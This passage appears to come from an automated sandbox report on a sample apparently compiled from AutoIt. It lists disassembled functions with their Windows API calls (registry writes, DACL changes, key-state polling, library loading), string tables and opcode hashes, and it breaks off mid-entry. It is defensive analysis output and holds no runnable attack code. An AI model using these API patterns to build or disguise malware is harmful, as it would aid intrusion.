                                          • Opcode ID: 8eda192c776775b5ffa6926f5397aeb64a781738215cf8a5e97db992684023b9
                                          • Instruction ID: 7b3e91065f736fb192d551bc820d4e2502216e8e63f0c4017f3366ea38885848
                                          • Opcode Fuzzy Hash: 8eda192c776775b5ffa6926f5397aeb64a781738215cf8a5e97db992684023b9
                                          • Instruction Fuzzy Hash: 05617E72901219AFDF019FA5EC49EEEBFB9EB08360F204116F915BB2A1D7709941CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00ED1128
                                          • GetDesktopWindow.USER32 ref: 00ED113D
                                          • GetWindowRect.USER32(00000000), ref: 00ED1144
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ED1199
                                          • DestroyWindow.USER32 ref: 00ED11B9
                                          • CreateWindowExW.USER32 ref: 00ED11ED
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ED120B
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00ED121D
                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00ED1232
                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00ED1245
                                          • IsWindowVisible.USER32(00000000), ref: 00ED12A1
                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00ED12BC
                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00ED12D0
                                          • GetWindowRect.USER32(00000000,?), ref: 00ED12E8
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00ED130E
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00ED1328
                                          • CopyRect.USER32(?,?), ref: 00ED133F
                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 00ED13AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: 77575c93e99b111f8decd8eba502c17c7378c6b4bc3189c95f24cfa1fa4e4881
                                          • Instruction ID: da723d3c6420e06c84cacd83655ebf8bbdd0553d6d8445937e901d0932896e4e
                                          • Opcode Fuzzy Hash: 77575c93e99b111f8decd8eba502c17c7378c6b4bc3189c95f24cfa1fa4e4881
                                          • Instruction Fuzzy Hash: DDB19C71608341AFD700DF65D884B6BFBE4FF88744F00995AF999AB2A1C731E845CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00ED02E5
                                          • _wcslen.LIBCMT ref: 00ED031F
                                          • _wcslen.LIBCMT ref: 00ED0389
                                          • _wcslen.LIBCMT ref: 00ED03F1
                                          • _wcslen.LIBCMT ref: 00ED0475
                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00ED04C5
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ED0504
                                            • Part of subcall function 00E5F9F2: _wcslen.LIBCMT ref: 00E5F9FD
                                            • Part of subcall function 00EA223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EA2258
                                            • Part of subcall function 00EA223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EA228A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                          • API String ID: 1103490817-719923060
                                          • Opcode ID: bdca0238a45da6816cd0491265ba1604588ca77f9db37f757a7e22866955f290
                                          • Instruction ID: 11168c712190625e69fcf231d30ba7ef5f8517f35ee2cd04e13d4ed4f131ad81
                                          • Opcode Fuzzy Hash: bdca0238a45da6816cd0491265ba1604588ca77f9db37f757a7e22866955f290
                                          • Instruction Fuzzy Hash: A6E19D316082018BC714DF24D550A6AB3E6FFC8318F18695EF896BB7A2DB30ED46DB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E58891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SystemParametersInfoW.USER32 ref: 00E58968
                                          • GetSystemMetrics.USER32 ref: 00E58970
                                          • SystemParametersInfoW.USER32 ref: 00E5899B
                                          • GetSystemMetrics.USER32 ref: 00E589A3
                                          • GetSystemMetrics.USER32 ref: 00E589C8
                                          • SetRect.USER32 ref: 00E589E5
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E589F5
                                          • CreateWindowExW.USER32 ref: 00E58A28
                                          • SetWindowLongW.USER32 ref: 00E58A3C
                                          • GetClientRect.USER32 ref: 00E58A5A
                                          • GetStockObject.GDI32 ref: 00E58A76
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E58A81
                                            • Part of subcall function 00E5912D: GetCursorPos.USER32(?), ref: 00E59141
                                            • Part of subcall function 00E5912D: ScreenToClient.USER32(00000000,?), ref: 00E5915E
                                            • Part of subcall function 00E5912D: GetAsyncKeyState.USER32 ref: 00E59183
                                            • Part of subcall function 00E5912D: GetAsyncKeyState.USER32 ref: 00E5919D
                                          • SetTimer.USER32(00000000,00000000,00000028,00E590FC), ref: 00E58AA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: 946b04e1571a1c5811f008c24649b27daea8bc641e72b9adfd3104164745c8f0
                                          • Instruction ID: 73f8f8ee1e6f29df2936b7f1b377a37e27838e6dc3b269f5826552ca37b6aa5a
                                          • Opcode Fuzzy Hash: 946b04e1571a1c5811f008c24649b27daea8bc641e72b9adfd3104164745c8f0
                                          • Instruction Fuzzy Hash: 5FB17831A0020A9FDF14DFA8D945BEA3BB5FB48355F11962AFA15BB290DB30E845CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EA1114
                                            • Part of subcall function 00EA10F9: GetLastError.KERNEL32 ref: 00EA1120
                                            • Part of subcall function 00EA10F9: GetProcessHeap.KERNEL32 ref: 00EA112F
                                            • Part of subcall function 00EA10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00EA0B9B,?,?,?), ref: 00EA1136
                                            • Part of subcall function 00EA10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EA114D
                                          • GetSecurityDescriptorDacl.ADVAPI32 ref: 00EA0DF5
                                          • GetAclInformation.ADVAPI32 ref: 00EA0E29
                                          • GetLengthSid.ADVAPI32(?), ref: 00EA0E40
                                          • GetAce.ADVAPI32 ref: 00EA0E7A
                                          • AddAce.ADVAPI32 ref: 00EA0E96
                                          • GetLengthSid.ADVAPI32(?), ref: 00EA0EAD
                                          • GetProcessHeap.KERNEL32 ref: 00EA0EB5
                                          • HeapAlloc.KERNEL32(00000000), ref: 00EA0EBC
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EA0EDD
                                          • CopySid.ADVAPI32 ref: 00EA0EE4
                                          • AddAce.ADVAPI32 ref: 00EA0F13
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EA0F35
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EA0F47
                                          • GetProcessHeap.KERNEL32 ref: 00EA0F6E
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0F75
                                          • GetProcessHeap.KERNEL32 ref: 00EA0F7E
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0F85
                                          • GetProcessHeap.KERNEL32 ref: 00EA0F8E
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0F95
                                          • GetProcessHeap.KERNEL32 ref: 00EA0FA1
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0FA8
                                            • Part of subcall function 00EA1193: GetProcessHeap.KERNEL32 ref: 00EA11A1
                                            • Part of subcall function 00EA1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00EA0BB1,?), ref: 00EA11A8
                                            • Part of subcall function 00EA1193: InitializeSecurityDescriptor.ADVAPI32 ref: 00EA11B7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                          • String ID:
                                          • API String ID: 4175595110-0
                                          • Opcode ID: 29a3ac5c173e3f594fb304f76c91bee8de59c3c3314ea47b540e777d058b093a
                                          • Instruction ID: 16fbed68407c8c04fae7a95c7b455eb0cf3460c74a471ad37adb8cd05d57456c
                                          • Opcode Fuzzy Hash: 29a3ac5c173e3f594fb304f76c91bee8de59c3c3314ea47b540e777d058b093a
                                          • Instruction Fuzzy Hash: 8E717F75A0121AEFDF209FA5EC44BAEBBB8FF09345F148116F915BA191D730A905CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ECC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ECC4BD
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EDCC08,00000000,?,00000000,?,?), ref: 00ECC544
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00ECC5A4
                                          • _wcslen.LIBCMT ref: 00ECC5F4
                                          • _wcslen.LIBCMT ref: 00ECC66F
                                          • RegSetValueExW.ADVAPI32 ref: 00ECC6B2
                                          • RegSetValueExW.ADVAPI32 ref: 00ECC7C1
                                          • RegSetValueExW.ADVAPI32 ref: 00ECC84D
                                          • RegCloseKey.ADVAPI32(?), ref: 00ECC881
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00ECC88E
                                          • RegSetValueExW.ADVAPI32 ref: 00ECC960
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 9721498-966354055
                                          • Opcode ID: da557de0655b7166037ceb85b7c082a90f7949c9c483b363f3f355186cafad8d
                                          • Instruction ID: d19c3d68e5046ad5af4452db1188b4be7f871359e62b27b8531d50cdd2cce932
                                          • Opcode Fuzzy Hash: da557de0655b7166037ceb85b7c082a90f7949c9c483b363f3f355186cafad8d
                                          • Instruction Fuzzy Hash: 421258756042019FDB14DF14D981F2AB7E5EF88714F14985DF88AAB2A2DB35FC42CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00ED09C6
                                          • _wcslen.LIBCMT ref: 00ED0A01
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00ED0A54
                                          • _wcslen.LIBCMT ref: 00ED0A8A
                                          • _wcslen.LIBCMT ref: 00ED0B06
                                          • _wcslen.LIBCMT ref: 00ED0B81
                                            • Part of subcall function 00E5F9F2: _wcslen.LIBCMT ref: 00E5F9FD
                                            • Part of subcall function 00EA2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EA2BFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 1103490817-4258414348
                                          • Opcode ID: 322b61fa44fd1eb41f2c29b5514e0b887b756f3fdc3d3aa6bc557a8a5a56c23d
                                          • Instruction ID: 59977e36a3b3fb5cc884f906914e8222ba72c78ddf761ae62fc1f5816673bdd2
                                          • Opcode Fuzzy Hash: 322b61fa44fd1eb41f2c29b5514e0b887b756f3fdc3d3aa6bc557a8a5a56c23d
                                          • Instruction Fuzzy Hash: DDE15C316087019FC714DF24C450A6AB7E2FF98318F18595EF8966B3A2D731ED46DB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ECC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 1256254125-909552448
                                          • Opcode ID: 3a31276eab0cf72c76dda2a4f92c78e69c1d00d5436ed6bf87cbc5fea8913ee1
                                          • Instruction ID: 1f6345e48e902dd0a2c0449419dd776b1305353a85f2916a2679c3acba92258d
                                          • Opcode Fuzzy Hash: 3a31276eab0cf72c76dda2a4f92c78e69c1d00d5436ed6bf87cbc5fea8913ee1
                                          • Instruction Fuzzy Hash: 3571EA32A0052A8BCB10DE7CDA41FBB73919BA4758B35252CFC5EB7285E632DD46D350
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcslen.LIBCMT ref: 00ED835A
                                          • _wcslen.LIBCMT ref: 00ED836E
                                          • _wcslen.LIBCMT ref: 00ED8391
                                          • _wcslen.LIBCMT ref: 00ED83B4
                                          • LoadImageW.USER32 ref: 00ED83F2
                                          • LoadLibraryExW.KERNEL32 ref: 00ED844E
                                          • LoadImageW.USER32 ref: 00ED8487
                                          • LoadImageW.USER32 ref: 00ED84CA
                                          • LoadImageW.USER32 ref: 00ED8501
                                          • FreeLibrary.KERNEL32 ref: 00ED850D
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ED851D
                                          • DestroyIcon.USER32(?,?,?,?,?,00ED5BF2), ref: 00ED852C
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00ED8549
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00ED8555
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 799131459-1154884017
                                          • Opcode ID: 4db1fb0400f97f3093d8ea484c7ccd6c2d8cfbb42ba5bee7f5ee0f8e2bd59adc
                                          • Instruction ID: 556a943fe3b21afc1117bc1a1e963ad7e1c92e7f77b652010cc43b7539b83df5
                                          • Opcode Fuzzy Hash: 4db1fb0400f97f3093d8ea484c7ccd6c2d8cfbb42ba5bee7f5ee0f8e2bd59adc
                                          • Instruction Fuzzy Hash: 29610171940216BEEB14DF64ED41BBF77A8FB04B51F10560AF815F62D0DB74A981C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E47778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 0-1645009161
                                          • Opcode ID: ec200f0b855b989b9dd320f260695699e997ddf638e47dc8b4ceeb441ebd9a81
                                          • Instruction ID: 35380326381e831f8450b4f25175fd647433452b2d318bee3166df6c9ebf3f1e
                                          • Opcode Fuzzy Hash: ec200f0b855b989b9dd320f260695699e997ddf638e47dc8b4ceeb441ebd9a81
                                          • Instruction Fuzzy Hash: CD811471A40605BBDB20AF60EC46FAE77A8EF14340F006426F949BA292EF71D911C7D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E600C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                          Download Yara Rule
                                          APIs
                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00E600C6
                                            • Part of subcall function 00E600ED: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00E6011C
                                            • Part of subcall function 00E600ED: GetModuleHandleW.KERNEL32 ref: 00E60127
                                            • Part of subcall function 00E600ED: GetModuleHandleW.KERNEL32 ref: 00E60138
                                            • Part of subcall function 00E600ED: GetProcAddress.KERNEL32 ref: 00E6014E
                                            • Part of subcall function 00E600ED: GetProcAddress.KERNEL32 ref: 00E6015C
                                            • Part of subcall function 00E600ED: GetProcAddress.KERNEL32 ref: 00E6016A
                                            • Part of subcall function 00E600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E60195
                                            • Part of subcall function 00E600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E601A0
                                          • ___scrt_fastfail.LIBCMT ref: 00E600E7
                                            • Part of subcall function 00E600A3: __onexit.LIBCMT ref: 00E600A9
                                          Strings
                                          • SleepConditionVariableCS, xrefs: 00E60154
                                          • WakeAllConditionVariable, xrefs: 00E60162
                                          • InitializeConditionVariable, xrefs: 00E60148
                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E60122
                                          • kernel32.dll, xrefs: 00E60133
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                          • API String ID: 66158676-1714406822
                                          • Opcode ID: a7645e602b5c32d63f77dcf0cb2204b227bd1783a8071797e39ed93401b418ba
                                          • Instruction ID: 3e7d46bf459501383869cd68b77511736f2309d770a671cf2e9054a1c1f2cc77
                                          • Opcode Fuzzy Hash: a7645e602b5c32d63f77dcf0cb2204b227bd1783a8071797e39ed93401b418ba
                                          • Instruction Fuzzy Hash: 2121F9326867266FD7105BA5BC06B6B33E5DB06BE1F10552BF902F32D1DFA09804CA91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 176396367-1603158881
                                          • Opcode ID: 349e6b88fbb4a2462886f3a671c6634c9a5a465f506f4ee1a77295b9269de164
                                          • Instruction ID: c0234be5378886f56790b59e41c73248ef3c9f871bc5a810344fa9b7e6e263bf
                                          • Opcode Fuzzy Hash: 349e6b88fbb4a2462886f3a671c6634c9a5a465f506f4ee1a77295b9269de164
                                          • Instruction Fuzzy Hash: 4FE1E431A005169BCB189FB8C4517EEFBB0BF5E754F14A119F466BB240DB30BE899B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharDriveLowerType
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2055661098-1000479233
                                          • Opcode ID: 9279262e0fd6c007970a37ecfd89a055c6e3e4dff292c85e71ef11102b56c231
                                          • Instruction ID: 55f69feb1f740363d48bc1a0a36ea8ab85d7af3c303d7d6969fe606b4a92affb
